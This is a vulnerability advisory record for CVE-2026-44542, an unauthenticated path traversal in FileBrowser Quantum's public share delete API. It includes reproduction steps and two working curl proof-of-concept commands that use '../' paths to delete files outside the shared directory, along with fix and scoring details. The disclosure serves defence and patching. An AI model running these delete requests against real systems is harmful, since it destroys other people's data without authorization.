{"id":"CVE-2026-44542","aliases":["GHSA-fwj3-42wh-8673","GO-2026-5383"],"url":"https://o3.security/vulnerability/CVE-2026-44542","summary":"FileBrowser Quantum: Unauthenticated Path Traversal in Public Share Delete Allows Arbitrary File Deletion","details":"### **Summary**\n\nAttacker-controlled path input is joined with a trusted base path prior to sanitization, allowing traversal sequences (e.g., ../) to escape the intended shared directory. As a result, an unauthenticated attacker possessing a valid public share hash with delete permissions enabled can delete arbitrary files outside the shared directory within the share owner’s configured storage scope.\n\n### **Affected Components**\n\n**Two distinct vulnerable code paths:**\n\n1. Stable versions (e.g., gtstef/filebrowser:stable)\n`DELETE /public/api/resources?hash=<hash>&path=../victim`\nRoot cause: middleware.go:111\nIssue: path query parameter is joined before SanitizeUserPath()\n2. Development / HEAD (e.g., commit eabdfd9)\n`DELETE /public/api/resources/bulk?hash=<hash>`\nBody: [{\"path\":\"../victim\"}]\nRoot cause: resource.go:274\nIssue: item.Path is joined before SanitizeUserPath()\n\n### **Steps to reproduce (Stable Version)**\n\n**1. Create a directory structure:**\n\n```\n/folder/shared_subdir/   (shared)\n/folder/protected.txt    (outside shared directory)\n```\n\n**2. Create a public share:**\n```\nPath: /shared_subdir\nAllowDelete=true\n```\n\n**3. Send request:**\n\n```\ncurl -X DELETE \"http://localhost/public/api/resources?hash=<HASH>&path=../protected.txt\"\n\n#Observe:\n#protected.txt is deleted despite being outside the shared directory\n```\n\n### **Proof of Concept (HEAD / bulk endpoint)**\n\n```\ncurl -X DELETE \"http://localhost/public/api/resources/bulk?hash=<HASH>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '[{\"path\":\"../protected.txt\"}]'\n```\n\n### **Alternative PoC Scripts:**\n[poc_v3.sh](https://github.com/user-attachments/files/26159404/poc_v3.sh) (**If the script fails due to environment differences, the manual PoC above reliably reproduces the issue.**)\n\n\n### **Impact**\nAn unauthenticated attacker with access to a public share link configured with delete permissions enabled can delete attacker-chosen files outside the shared directory, anywhere within the share owner’s storage scope. This results in unauthorized data loss and potential service disruption.","published":"2026-05-14T17:07:30.602Z","modified":"2026-08-12T03:51:15.357796100Z","cvss":{"score":9.1,"severity":"CRITICAL","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"},"epss":{"score":0.00523,"percentile":0.43176,"asOf":"2026-09-17"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"Go","name":"github.com/gtsteffaniak/filebrowser","fixedVersion":"0.0.0-20260501183844-112740bdd41d"}],"fix":{"url":"https://github.com/gtsteffaniak/filebrowser/commit/112740bdd41de7d5eb01e13ba49d406bfc463f69","label":"gtsteffaniak/filebrowser@112740b"},"references":[{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/44xxx/CVE-2026-44542.json"},{"type":"ADVISORY","url":"https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-fwj3-42wh-8673"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44542"},{"type":"WEB","url":"https://github.com/gtsteffaniak/filebrowser/commit/112740bdd41de7d5eb01e13ba49d406bfc463f69"},{"type":"PACKAGE","url":"https://github.com/gtsteffaniak/filebrowser"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T03:51:15.357796100Z"}}